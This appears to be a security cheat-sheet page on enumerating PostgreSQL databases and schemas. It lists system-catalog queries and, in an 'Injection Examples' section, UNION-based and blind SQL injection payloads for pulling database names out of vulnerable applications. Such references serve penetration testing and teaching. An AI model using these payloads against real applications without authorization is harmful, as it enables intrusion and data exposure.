postgresql

Database Names

How to retrieve database names in PostgreSQL

Information Gathering Last updated: December 16, 2025
databasesenumerationreconnaissance

Retrieving Database Names

PostgreSQL stores database metadata in system catalogs that can be queried to enumerate available databases.

Current Database

-- Get current database name
SELECT current_database();

-- Alternative
SELECT current_catalog;

Current Schema

-- Get current schema (search path)
SELECT current_schema();

-- Get full search path
SELECT current_schemas(true);

-- Show search_path setting
SHOW search_path;

List All Databases

-- Using pg_database system catalog
SELECT datname FROM pg_database;

-- Exclude template databases
SELECT datname FROM pg_database WHERE datistemplate = false;

-- Get databases as comma-separated list
SELECT string_agg(datname, ',' ORDER BY datname) FROM pg_database;

Database Information

-- Get database details
SELECT datname, datdba, encoding, datcollate
FROM pg_database;

-- Get database owner name
SELECT d.datname, r.rolname as owner
FROM pg_database d
JOIN pg_roles r ON d.datdba = r.oid;

List Schemas in Current Database

-- All schemas
SELECT schema_name FROM information_schema.schemata;

-- Using pg_namespace
SELECT nspname FROM pg_namespace;

-- Non-system schemas
SELECT nspname FROM pg_namespace
WHERE nspname NOT LIKE 'pg_%'
AND nspname != 'information_schema';

Injection Examples

-- UNION-based database enumeration
' UNION SELECT NULL,datname,NULL FROM pg_database--

-- Get current database
' UNION SELECT NULL,current_database(),NULL--

-- List all schemas
' UNION SELECT NULL,string_agg(schema_name,',' ORDER BY schema_name),NULL FROM information_schema.schemata--

-- Blind injection (extract database name character by character)
' AND SUBSTRING(current_database(),1,1)='p'--

Using LIMIT and OFFSET

-- Get nth database name
SELECT datname FROM pg_database LIMIT 1 OFFSET 0;  -- First
SELECT datname FROM pg_database LIMIT 1 OFFSET 1;  -- Second
SELECT datname FROM pg_database LIMIT 1 OFFSET 2;  -- Third

Notes

  • pg_database is accessible to all users
  • Database enumeration doesn’t require special privileges
  • The current_database() function is always available
  • Template databases (template0, template1) are usually not interesting for attacks